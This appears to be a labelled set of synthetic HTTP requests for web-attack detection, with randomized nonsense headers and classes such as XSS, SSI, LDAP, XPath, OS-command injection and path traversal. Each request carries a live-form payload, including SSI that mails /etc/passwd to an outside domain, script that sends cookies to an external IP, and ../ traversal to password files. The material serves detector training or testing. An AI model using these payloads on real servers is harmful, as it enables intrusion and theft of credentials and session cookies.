GET /gtasrinosna/tNfL7mgEctsgS/nO50aiqFbinzGHoptFC/fGGHBu3XQ2Uexec.eF/kR_5RQperlAz@/55N_GbY-py/kahiioroa0a7S/setnIerdiic/df_9hb69AFH@gX.cgi?2O8GqNTVK3u=riaNb%29ftciesht&roo=%3C%21--+++++%23include++++virtual%3D%22%2Fetc%2Fpasswd%22--%3E&anu=55&r9ho3wpv=Feaedwtn8Snxhpi0&slsxtnVep9bssl=te+xmllas4wt+ftot&eBM=16218252&onoym2nnajat=732&Ii7bE=amene&ksubySTcHu=1&le=dgyCkW1R57cE&Gxcr9=lfromN&Ae=81573&obhahs7aI=s0e&mooa=0459842 HTTP/1.1
Host: 152.203.102.102
Connection: pziorl
Accept: application/*;q=0.2, audio/*;q=0.7
Accept-Charset: euc-jp, x-mac-japanese;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 170.88.156.59
Cookie: hooIeisitumoi=25051156
Cookie2: $Version="38"
Date: Sat, 17 Sep 05 17:01:22 UTC
ETag: W/"xkPYfz.4VPY.xSX"
Expect: 100-continue
From: ekb7rls@onnByehnb.gov
If-Modified-Since: Thu, 05 Mar 09 18:55:28 CET
If-Unmodified-Since: Wed, 14 Jul 04 02:34:49 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nc=ddEF82d6
Authorization: Digest algorithm=MD5
Range: 11490-87515,-392,063833-721563
Referer: /eeqn.jsp
TE: trailers
Trailer: User-Agent
User-Agent: cswdna (aY8NtM8Q; yQpoKDX; lZ@MZ0Xi; rsljJ3m; aowIBO8h)
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: FTP/0.3 www.yrla.htm
Transfer-Encoding: compress
Upgrade: im0/0.0, gln/3.7
Warning: 245 www.etcYe.gif "ra5teOtlcka8shsedl7" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39690
Start - Id: 36982
class: LdapInjection
GET /ht1AzyiuiSlimed/0tTsqorhtkofrpaj/Wqmp.NS0OYt/SHY2-Hp1/Q6RNIIbmcopybN2Yups/dVuVpevsk/eSZizEe-QdH/5eolWjUpMLWX/qthyrngtdpr/e7Q6XVaxNuG0pov8r9a9/veaaAiieepwref/sUgbCKRf_wBRpQXTCOS.js?uces7c=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&PMs0=h&nls8ertGn=el2Fm&8eeg9Dnsoureg=t%3Fexecl+l&6dqeu0=y%292%3D%3AAhtcon&eccatraus2teht=ri&rlsg=%3Fos06%3Ehfahoti30qee&92ntDtatr=aeats&SwmepbowibiorR=geR&eeorDtrentTpz=1142920 HTTP/1.1
Host: www.eeaetniga.net
Connection: Gyu4y
Accept: */*;q=0.2
Accept-Charset: x-mac-roman, iso-8859-8;q=0.2, iso-8859-15;q=0.2, x-mac-arabic, us-ascii
Accept-Encoding: 
Accept-Language: mpoihcn-u;q=0.4, rjinen-g9zerhnT;q=0.1, ichI9p-are, iqi-eby;q=0.9
Cache-Control: no-cache
Client-ip: 206.238.216.53
Cookie: imscriptO21YtCH-=g
Cookie2: $Version="434"
Date: Sat, 13 Jan 07 11:00:49 GMT
ETag: W/"YZcyTj4_d3_1LAB"
Expect: lius
From: 4t9lsozn@n1ns8ofqic.ch
If-Modified-Since: Thu, 23 Dec 04 01:47:36 GMT
If-Unmodified-Since: Fri, 18 Aug 06 02:46:42 CET
If-Match: *
If-None-Match: "pc-oEkXLVe-JP1W"
If-Range: *
Max-Forwards: 0366
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest nc=5BcF531c
Authorization: Basic YVJlcnpkOnRkY2JoZA==
Range: 84-,-422477,1197-5319
Referer: /rrd5N4.zip
TE: deflate,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/9.5 (Windows; U; Win 9x 5.4; dj-7l; rv:3.3.2) Gecko/03494046
UA-CPU: MIPS
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 654x7541
Via: 3.2 www.onermn1l.png:2294
Transfer-Encoding: compress
Upgrade: m2cnia/0.2, h1ebb/7.9
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Forwarded-For: 159.94.130.144
X-Serial-Number: 4593021783716355
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36982
Start - Id: 40166
class: SSI
GET /yhrtqnr1ioeeToynt4wd/JnV.css?oofufesadig=%3C%21--+%23exec+cmd%3D%22%2Fbin%2Fls+++-l+++++%2Fhome%2Fggasa%2Fhaol%22++--%3E&f0de5b=hs7%24usock_streamtoe%3Dt&pat44=9eAhomeeOsNonua HTTP/1.1
Host: www.zejtgdqU.fr:7877
Connection: close
Accept: */*;q=0.0
Accept-Charset: macintosh, x-mac-cyrillic, windows-1251;q=0.3, iso-8859-7;q=0.4, iso-8859-2
Accept-Encoding: *;q=0.7
Accept-Language: r-hsin;q=0.9, te2cWhlf-lnriGdbg;q=0.2, 6F-wdrMffh
Cache-Control: no-cache
Client-ip: 165.96.86.136
Cookie: VIItzQJqgroup byphplT=s.K.R;max=ft;lku1=m+ae;n5it4cgimtb=569
Cookie2: $Version="35"
Date: Tue, 12 Jun 07 05:14:32 UTC
ETag: "I8NjgBcm-6Mpv6vNVdCg"
Expect: 100-continue
From: stce@ygsk.st
If-Modified-Since: Mon, 03 Aug 09 19:21:58 UTC
If-Unmodified-Since: Sun, 17 Aug 08 19:08:50 GMT
If-Match: *
If-None-Match: "gG9GNSFxRRKbQ2k"
If-Range: Sat, 26 Jul 08 09:39:19 GMT
Max-Forwards: 54
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: NTLM bnNhTzVvaG96dGFubGljSWhyYXBlbTdzZXRtaGljZWhrdWZzcG8=
Range: 728-,7-688430
Referer: /P3cl/psrne.png
TE: trailers
Trailer: Warning
User-Agent: Mozilla/2.3 (compatible; MSIE 3.5; Unix; Nesyh)
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: 0.0 20.23.193.181
Transfer-Encoding: compress
Upgrade: w70e/2.8, naoa/9.2, ror/0.7
Warning: 869 194.107.104.219 "zteAwiu4sn" 
X-Forwarded-For: 165.252.155.117
X-Serial-Number: 272830551507050380
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40166
Start - Id: 47555
class: XSS
GET /o-WhDJLL/qto/bnSRQ.n@/uyetiu/pdUfh/ovUt/o7wyQnoKAOV.rvCUzI/g8SYYJTGGd3zy00e0nl.swf?rWagN6ped=4217&d3aiha4dgt=%3Cmeta+++++http-equiv++++%3D+%22+refresh++%22+content++%3D+++%220%3Burl%3Djavascript%3A++%5Bwindow.open%28%27http%3A%2F%2F222.118.171.68%2Fretr.jsp%27%2Bdocument.cookie%29%3B%5D+++%22+++%3E&it=lu3IeMhR..&Esqj6uk2rdpQp=yaev%29i6e&cttHernXijIlje=2814 HTTP/1.0
Host: 206.174.196.98
Connection: oulznm
Accept: video/*;q=0.6, application/x-tar
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.7, deflate, deflate
Accept-Language: v-ewtPpa;q=0.9, 3s-OaxIjti, tocoas-fw
Cache-Control: only-if-cached
Client-ip: 113.227.139.221
Cookie: de9ar=6421;penssaerrnYa=(rn;b_HJ9QIlnCh=iwD_R;ewD=ee ;trhseuntarjtev=eWn
Cookie2: $Version="8"
Date: Mon, 23 Jan 06 22:46:08 GMT
ETag: "ZfTviux_Ctk_FaI1Yr7D"
Expect: aZpnthrk
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Sun, 02 May 04 05:13:20 GMT
If-Unmodified-Since: Thu, 24 Jan 08 15:48:09 CET
If-Match: "Hmhu4usGYPXD65iaBV1G"
If-None-Match: "qTkrEdgRX.XPC@P"
If-Range: Tue, 27 Apr 10 13:27:28 GMT
Max-Forwards: 2
MIME-Version: 3.1
Pragma: nloon='ehevs'
Proxy-Authorization: NTLM Nm5laWV0MGl2TnRzb0VhMnJrbG1pbmQ2ZWFkemN0Zzk1ckZCaGU=
Authorization: Digest algorithm=MD5-sess
Range: 946-214738,54330-8
Referer: http://www.efhti.com/tyldq1t.php4
TE: deflate,trailers,trailers
Trailer: Accept-Language
User-Agent: e67tteKludkteloH1tr
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2187x3503
Via: HTTP/8.9 84.234.127.185, 6.5 228.22.14.50, FTP/5.2 www.eestafif.html
Transfer-Encoding: identity
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 112.140.177.233
X-Serial-Number: 57604389
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47555
Start - Id: 42847
class: OsCommanding
GET /etisp4lr/vilosop01nOsrderi/vj2Uctf-@jsii/cwmen5rb/k3atsxtAsyxqi/7i8gvaj.css?CodocumentPKgLT_WG=nd0ng&bttsHroeic7larr=mdUTrwep&y77iah1oold=tnres0aiveea3kkol4&gahqeOemd=Vsn5Ynsatffaedaa&autoexecAHF=6h&L1@6c2acceptTaU=em2GGoLW3H&uMolllimto=rj2cE5&7rvpi=9962147&lusaanthteussh=6sdp&ienjOwre=xdilt&imn5hlebr=65.232.100.19+++%7C+dir&jAJ0v=sjueinfee HTTP/1.1
Host: www.caseu1mggt.net:5
Connection: close
Accept: text/plain
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, gzip
Accept-Language: 2rRsh-dahc, oi-celdvp;q=0.8
Cache-Control: only-if-cached
Client-ip: 143.230.118.47
Cookie: O6MZ=y9zz7YLVAP;odcs6ct=537878;r1f=1021522
Cookie2: $Version="840"
Date: Wed, 15 Jul 09 02:03:43 UTC
ETag: W/"olCrtg5FxsS-VvM"
Expect: 100-continue
From: l6tz5hd@ruglhe.be
If-Modified-Since: Thu, 07 Jan 10 15:45:26 UTC
If-Unmodified-Since: Mon, 05 Sep 05 20:53:22 GMT
If-Match: "APn_FheDimUModWFJ"
If-None-Match: "Z6GEjEtI2dmmmnOy10A"
If-Range: "ZiEy-bnA8m1M4OmNB"
Max-Forwards: 65
MIME-Version: 7.9
Pragma: sngnjh5='tagt7f'
Proxy-Authorization: njdei gtdN=st7gs
Authorization: ashu aliHe=hEgi
Range: -885,-18051
Referer: /zrlrr0/eahfYe/isbHews/uac0/owpye.php3
TE: gzip
Trailer: Host
User-Agent: toat9Nclftt8eO3byn
UA-CPU: Sparc
UA-Disp: 7817,3346,16
UA-Color: color16
UA-Pixels: 1193x1231
Via: 8.5 100.201.44.244
Transfer-Encoding: Tisca
Upgrade: Rhetio/0.3, d5nIg/4.3
Warning: 831 253.234.94.229 "urhmxsr8a0ucgtYcTaym" "Thu, 10 Mar 05 12:24:31 GMT"
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42847
Start - Id: 46965
class: XSS
POST /DWccmochaZ/eopEniarydoci1eoV/h2gutenl/wmit7up1jx9eneofi/2F@/69nS8Uf/ohrgvgStEoIise/pW/omiuacirtlipyo6tlQe/isdelesfs/insert3WGKQs2fhx9.js? HTTP/1.0
Content-Length: 105
Content-Encoding: deflate
Content-MD5: ZXpuZnR1ZGJ1dnNsZWllbw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 01 Apr 06 11:16:37 GMT
Host: 190.108.107.40
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: twthrise-mhnnrnsl;q=0.9, ny4put-a0sahsb, najir-seMaield, deaere-z, qpoeaeIr-lGifhoOR
Client-ip: 96.10.101.131
Cookie2: $Version="50"
If-Modified-Since: Thu, 24 Apr 08 13:12:40 UTC
If-Unmodified-Since: Fri, 07 Jan 05 06:31:32 GMT
If-None-Match: *
Max-Forwards: 4
Pragma: no-cache
Authorization: Digest response="0143B94a99cEfc3FB33C4282D3CaaC48"
Referer: http://lyepen0Q.uk/lLef/hiancF.png
User-Agent: Mozilla/9.4 (compatible; MSIE 3.2; Open BSD i386; heietSenn; fndRd)
Via: 6.4 100.236.158.147, HTTP/5.0 www.oesrjsb.gif, 1.7 www.foaiosOd.html
X-Forwarded-For: 160.153.19.157

kmmiy4pnoi9=<script    >alert    ('7tnoSuUe.r3Oz3')</script    >&aDuieaqohio=ah9dexecno

End - Id: 46965
Start - Id: 46489
class: XSS
GET /<SCRIPT>/? HTTP/1.1
Host: 1.92.235.99:80
Connection: keep-alive
Accept: image/png;q=0.7, text/plain
Accept-Charset: *
Accept-Encoding: identity;q=0.2, gzip;q=0.7, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 137.78.176.107
Cookie: daYr5owIor=937466424;dQTfbde=88;icen=u5qBq;cbecx= 'sbtaC%u/ddhome2aiinscriptw;gi8=hd7eis6oddfnmro
Cookie2: $Version="5"
Date: Sun, 24 Sep 06 19:56:07 UTC
ETag: "XgEaHknSpO0avcsEQ"
Expect: ith49hei=hrdod6si
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Sun, 13 Jul 08 07:51:28 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 25 Feb 07 09:32:05 UTC
Max-Forwards: 58
Pragma: no-cache
Proxy-Authorization: detou Jxsacw=pheC
Authorization: ysn04a eecj4=Nyasx
Range: 0-48
Referer: http://www.jnaaEeea.de/mdre.sh
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.0 (Windows; U; WinNT 7.2; 8o-nx; rv:0.7.6) Gecko/84137929
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: 0.5 www.o9qe2l.htm, hfe9ia/0.7 www.skhsc7.js
Transfer-Encoding: compress
Upgrade: i9r6of/0.6, tAiumh/1.5
Warning: 616 www.HiVsl3ns.js "wiis9esdak" 
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 46489
Start - Id: 36329
class: PathTransversal
GET /ttQi_7p5-.9yyea/o2Nna.sKRl3.jsp?5eatIA=l%3A%2F.htaccess%7E&FndnNebsc=1574145&nc3ucwynw=dkcrdosn HTTP/1.0
Host: 35.192.42.217
Connection: eynwviiE
Accept: */*;q=0.2
Accept-Charset: x-mac-roman, windows-1250;q=0.4, iso-8859-9;q=0.7, koi8;q=0.8, euc-tw;q=0.2
Accept-Encoding: compress;q=0.3, identity
Accept-Language: ne0t-rsruhszR;q=0.4, ttnini-iHioIagz
Cache-Control: sa=tsiat
Client-ip: 179.242.140.245
Cookie: ioCKFhOPzx=tL3V-
Cookie2: $Version="430"
Date: Sun, 18 Oct 09 22:20:31 UTC
ETag: "YheWX8B.bpdlJCw5@ydv"
Expect: 100-continue
From: potfI@7waa4m.be
If-Modified-Since: Sat, 18 Jun 05 17:40:02 GMT
If-Unmodified-Since: Wed, 17 Dec 08 05:04:30 GMT
If-Match: *
If-None-Match: *
If-Range: "9gHKbecVyHiF-0y.Y"
Max-Forwards: 93
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: syfynm aanhqIcd=iLha
Range: 94941-674,-88804,1546-98301
Referer: /ctf0/ebhohnao/sehn/lherxsd.php
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/6.4 (compatible; Konqueror/7.5; Win98; aettH0n)
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 625x983
Via: 0.4 28.70.239.203
Transfer-Encoding: compress
Upgrade: itor/5.7, 4up4ta/3.2
Warning: 156 85.95.63.97 "Leweeelritieh" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 876584717
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36329
Start - Id: 39895
class: SSI
GET /7J-fI0.js? HTTP/1.0
Host: 108.48.0.8
Connection: keep-alive
Accept: text/plain;q=0.6, video/quicktime;q=0.5
Accept-Charset: euc-jp, utf-7;q=0.0, gb2312, iso-8859-4, iso-8859-9
Accept-Encoding: deflate, gzip;q=0.1, deflate, identity, identity;q=0.2
Cache-Control: no-cache
Client-ip: 141.68.193.206
Cookie: vtsC=<!--  #exec    cmd="/bin/mail   tudeayeint.com   <   /etc/passwd"-->
Date: Sun, 19 Nov 06 14:38:31 UTC
If-Unmodified-Since: Sat, 08 Oct 05 16:48:16 GMT
If-Match: "8dsslqa5e85Kpzx"
Max-Forwards: 6
Referer: /ubrrriac.aspx
TE: gzip,trailers
User-Agent: Mozilla/1.1 (X11; U; Unix 8.9; 7h-in; rv:4.4.5) Gecko/93268860
UA-OS: Solaris

null

End - Id: 39895
Start - Id: 43326
class: OsCommanding
GET /ehjVjuKv5slWhmVdp/6sEtyej/ss/nse7X2/hPcgjXK@YIgAmXs/i.T/mfsira/echon6IARS/skWl..NQ/powCOfNKxuwEDtLl-/ef/nrCmexlerceErsc3n5.js?aSmhrpne=spdn&nbeiTs9eweeeoit=307&hsdsbraI2=%2Fperl+++++%2Ftmp%2Fstra.pl+++-p9460&loib=odsttet66teh&cieakoe=hw%26da+t+cchu41&Ltts=ihdiaooIo&mrTzUimtes=tJoHq&syn=h-sjamXEv9w&mffnaru=797&asdhvwfzb=+hstrpzob8acKpss0a&stama9=3coeN&jq3Edselecto=n%3Cfr&BrVN-8SXH=rqn+s&ttquAtwesHnnE3=483780&aqr=a HTTP/1.1
Host: 127.161.245.96:5731
Connection: keep-alive
Accept: application/zip, text/plain;q=0.7, text/plain
Accept-Charset: iso-10646-ucs-2;q=0.3, iso-8859-8, utf-8
Accept-Encoding: *
Accept-Language: icj-dtfpltpt, La1iq-d4ao;q=0.1, eenoy-s, tPAeau-p, s-s4Sns;q=0.8
Cache-Control: se0hida=no0k
Client-ip: 86.69.183.54
Cookie: at=42;wxleisgg1wuet=5;s9ttefah=74;mtmIC=aR90xwcovsLa9r
Cookie2: $Version="3"
Date: Sun, 05 Nov 06 07:47:05 UTC
ETag: W/"ojjDGkBlW@FU8f9_"
Expect: 100-continue
From: eTnr@war0.be
If-Modified-Since: Thu, 08 Jan 09 08:45:51 GMT
If-Unmodified-Since: Tue, 02 Dec 08 22:59:24 GMT
If-Match: "i6TkusYWAoxyKXQgsf"
If-None-Match: "hf9EK0BKee5Yoke"
If-Range: Thu, 29 Apr 10 20:00:33 GMT
Max-Forwards: 87
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM aXlCUG5Zbm5ybXJ0aUZ6dG85SXdlaGVmZ2ZkaXVhZ2Rkdnlpb25saGJL
Authorization: otoo itqu6=kdmai
Range: 2030-1
Referer: /pIaniDc/6aacelo/pstdou/RlYikaHl.mspx
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: Mozilla/7.7 (Windows; U; Win 9x 8.0; hs-1c; rv:0.0.1) Gecko/96313362
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: FTP/9.5 www.aoiIei8A.shtml, 2.9 www.C5tvpm.js, FTP/1.2 156.245.175.107
Transfer-Encoding: identity
Upgrade: s6hdl/7.5, 6rdns/6.0, wt2/7.2, trtfwt/0.2, z5mi/7.4
Warning: 213 www.e6ttha.html:3574 "evi1u0aas9lO3ep" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 356926769417178111
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43326
Start - Id: 38599
class: LdapInjection
GET /iheoae7mtx/igNMBpOvA1c/libu-zr/zm8u/cthqmr9emweh/smb/t_/lha84a/Ph7/eaeh2eIikt4nl.css?9Z6tmp@e=%29++%28%7C%28displayName%3Dhad*%29++++%28name++%3D++++had*++%29%28++++mail%3Dhad*+++%29&ntl5atexrmhne=nt%28no&systemj06B6UA5j=1si&vfrnttlriiqr=0gnKiOo6ZT&ln1ece=hJeTJRYse4&stnnsto9a=dshtu&childGQvT0ahtacceskHdetcO=a&ouOmbylDIcireRe=9008&dhevfehitniai=saieogeedu&1osQ1F=uDxDg6hat&4n=05392583&tidaoaewverscs=st&K4iUncOIGC=e+%2Bot-Re%5Dx&aonm=6178&4s4tsati9r=%29pkdlikemailsbsBRtko HTTP/1.1
Host: 75.32.132.15
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ol-ofs2ite;q=0.0, ytmA4n-S4phoy0;q=0.4, nlo-r6
Cache-Control: zHl3Umdo='b'
Client-ip: 158.4.8.166
Cookie: MtmpFtelnetAJ7b3Uecho=9aas;tct=p%cxmlas ;nOMHwdefaacnpx=4nDL694Y0;eEg0aa=58;U8npC=iaschAmStuiak
Cookie2: $Version="7"
Date: Fri, 29 Apr 05 15:12:35 GMT
ETag: W/"kSKQQra7qza5oDQMRw"
Expect: 0saert
From: Henr0sl4@nexht.fr
If-Modified-Since: Fri, 05 Mar 10 21:06:24 CET
If-Unmodified-Since: Mon, 24 May 04 23:58:04 UTC
If-Match: "Mzkuq8S0k7I0WV5B9nYe"
If-None-Match: *
If-Range: Thu, 20 Jul 06 06:10:57 UTC
Max-Forwards: 562
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0Nnzylmx"
Authorization: NTLM ZGFyVHN0MWxpYW5nZWxpcDBuc3JyYWZldGV5aWJhbDVuZWQ=
Range: -348176
Referer: /7itn00zs.gz
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/1.8 (X11; U; Linux i586 4.3; Da-wR; rv:7.0.5) Gecko/14573411
UA-CPU: Sparc
UA-Disp: 761,265,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2971x6869
Via: da8yvH/0.6 138.246.109.48
Transfer-Encoding: identity
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 619 187.93.166.222 "etLesebuo9iioii" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 38599
Start - Id: 45542
class: PathTransversal
GET /eSujKvI-ioTdf-p_XiP.html?odwhri=%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: www.e4tlne.it
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.9, gzip;q=0.4, compress, compress
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 189.238.147.1
Cookie: nbHn=wqe;YYzyuou_tPpf=cwbuse;Rk2deletestyleE0c7Jkf= leg
Cookie2: $Version="65"
Date: Wed, 23 Dec 09 23:04:02 GMT
ETag: "_4i.sK62g09@pXchU"
Expect: risLed=ttyu;ktgn0r8=sEtyhds
From: tdntoueY@seoidlrr.fr
If-Modified-Since: Sat, 16 Jun 07 14:58:32 GMT
If-Unmodified-Since: Tue, 22 Mar 05 15:55:21 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 13 Dec 04 20:49:55 GMT
Max-Forwards: 57
MIME-Version: 3.3
Pragma: i5H2n='hkcuc'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: NTLM dmFzZm1ua29vT3NjZW5mZHd0ZXJ0YWFzOERsdWlKZVR1Z2NuY3JrbzBy
Range: 903-3,3-4324,-8
Referer: http://www.GAbbr.gov/32mg/teira.cgi
TE: deflate;q=0.6,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.4 (compatible; Konqueror/2.2; Solaris; nyo5Op)
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 220x9820
Via: FTP/0.1 www.nosa.js, 4.5 www.lSiaut.html, 3.7 www.intgef2E.htm
Transfer-Encoding: teute; 9Ben=itin
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 2215888867609
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45542
Start - Id: 49602
class: XPathInjection
GET /ehd26n52WxnueC/nceopp5/aKKdL2pp.cfm?w41qpasswdo=tr&cbcraobtewe=2857&tmpQSnrb1RTnaR=httpnuh%3Euii&jtta6astq=bkit&tv0d3so=fv%26%7E8igwbt%5Dkcn+r&EIsScgFUxgroup by@=iahpd&0eu=rGc%27%5D++++%7C++++P++++%7C+%2F%2Fuser%5B++name%2Ftext%28+++%29++%3D+%27Cj&t4eeamtni1=68&enpoaE9cescvfe=cyod1laotoodaei&uvwkrisnahnyas=5060089599&qA=e+mofdtmpvsE&Mshutdownsn6Bv9F=nzthha HTTP/1.1
Host: www.2raaa.gov:80
Connection: close
Accept: application/*;q=0.8, image/*;q=0.4
Accept-Charset: koi8;q=0.8, cp-936;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 18.186.79.70
Cookie: telnetOZx='aite;Q@Kg=76;oyj-mSy9POu=nhlseNn'iHutao
Cookie2: $Version="785"
Date: Mon, 09 Jun 08 11:09:45 CET
ETag: "OmYn45rY5Z5qYtyD0"
Expect: 100-continue
From: tdaOt@esEtnmNs.it
If-Modified-Since: Fri, 09 Nov 07 03:06:27 GMT
If-Unmodified-Since: Sun, 13 Jul 08 14:45:52 GMT
If-Match: "eHujKSEypHPDUITto0m@"
If-None-Match: "9pggvc4YLE85.tCAZzy5"
If-Range: Tue, 25 Mar 08 02:09:17 UTC
Max-Forwards: 01
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Hsia5 4xaft=eores4
Authorization: Basic MGNudHNPZjphamF1
Range: 7852-
Referer: http://rbca.uk/hwad/aT8ffx/rgynLs/nyufc.cgi
TE: gzip;q=0.4,deflate
Trailer: Range
User-Agent: Mozilla/6.6 (compatible; MSIE 2.9; Win98; pApltehiem)
UA-CPU: StrongARM
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 122x540
Via: baa1iu/3.2 www.cewhy.gif:6874
Transfer-Encoding: teeth; aohrR1ca=tdssarr
Upgrade: add/2.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49602
Start - Id: 46349
class: PathTransversal
GET /eyUIIaN3mtdYu-G/ylde/s7hnkxoKzvAk254jar/nEv/tFQ8afgi7NR6/jsndmsoiuexgs.asmx?oe3es=umehs&olctAepej=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0
Host: www.ssn7eadft.fr:2078
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: euc-tw;q=0.8, x-mac-ce;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: iaNoyGri-iiit;q=0.2, s-ies;q=0.7, pezndahl-enn;q=0.2
Cache-Control: max-stale
Client-ip: 51.115.37.124
Cookie: rhbet=nl(;hr=leuisnVema ?;occ=3E;1bqdriyA=t<;httpsRnc56.Jls=lbenMrteac
Cookie2: $Version="19"
Date: Sat, 15 Dec 07 11:35:03 GMT
ETag: W/"qp8J7XhNTc2YYdTu0pyK"
Expect: 100-continue
If-Modified-Since: Sun, 23 Dec 07 07:40:03 UTC
If-Match: "Aw1QgKMgfJRrHaYSr0a"
If-None-Match: "rKUAANKDBvP73oT"
If-Range: "cbXFktDtc1jqYeVg"
Max-Forwards: 94
Pragma: bdih3afa=e
Authorization: Basic bHMyMzpVbDFzYWU=
Referer: /eden.shtml
TE: chunked,trailers,chunked
Trailer: Authorization
User-Agent: igIes7mHt/5.5.1.4.3
UA-CPU: StrongARM
UA-Pixels: 648x2225
Via: FTP/6.3 224.160.182.170, 1.7 www.thryd.shtml, 1.9 199.172.198.9:359
Transfer-Encoding: deflate
Warning: 915 23.102.86.169 "8rrnetn" 
X-Forwarded-For: 67.104.67.27

null

End - Id: 46349
Start - Id: 37085
class: LdapInjection
GET /jB/r6/JIK7g40kWZS5S/eTS/ho7e-AzOTYT.@dVc/rMcRk/Ju351Q6S_yAV/hri01si/i1zOWnap4dkM75FH1X/O12WFscriptj2A/htitEYaoPe.bin?9voEgi9n6miit=fzqo.aCCznaE&attneiceaHAnd=%29++++%28+++%7C++++%28+cn%3D*o++++%27brien*++++%29%28mail++++%3D*o+%27brien*++++%29+++&gxsio=ar+i%3Fdze3oas&NneW=vjsock_streameh&n7a2voMte9hAri=varot7ntdivnehrlsam&OomSNrecrtElt=sxa039R53&@.Ag4@yjN4G=iriihcsi&Fymr=positionfqy HTTP/1.0
Host: 129.167.63.107:59
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, compress;q=0.6
Accept-Language: ozq5qc-eho;q=0.5
Cache-Control: max-stale
Client-ip: 43.147.155.41
